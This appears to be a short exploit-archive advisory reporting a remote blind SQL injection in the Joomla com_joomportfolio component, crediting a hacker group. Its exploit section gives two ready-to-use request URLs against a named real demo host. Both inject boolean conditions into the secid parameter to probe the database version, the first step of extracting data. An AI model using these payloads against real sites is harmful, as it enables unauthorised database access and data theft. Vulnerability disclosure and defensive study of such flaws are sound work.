The Joomla JoomPortfolio component suffers from a remote blind SQL injection vulnerability.
05a3d41dd6b2f993853b81ea51bf65e0c21e6452e21f005080acde43239dbd2a
==============================================================================
[»] Joomla com_joomportfolio Remote Blind Injection Vulnerability
==============================================================================
[»] Script: [Joomla]
[»] Language: [ PHP ]
[»] Founder: [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]
[»] Greetz to:[ sec-warTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ]
###########################################################################
===[ Exploit ]===
[»] http://demo.joomplace.com/index.php?option=com_joomportfolio&task=showsec&Itemid=44&secid=1+AND SUBSTRING(@@version,1,1)=4 (no)
[»] http://demo.joomplace.com/index.php?option=com_joomportfolio&task=showsec&Itemid=44&secid=1+AND SUBSTRING(@@version,1,1)=5 (yas)
###########################################################################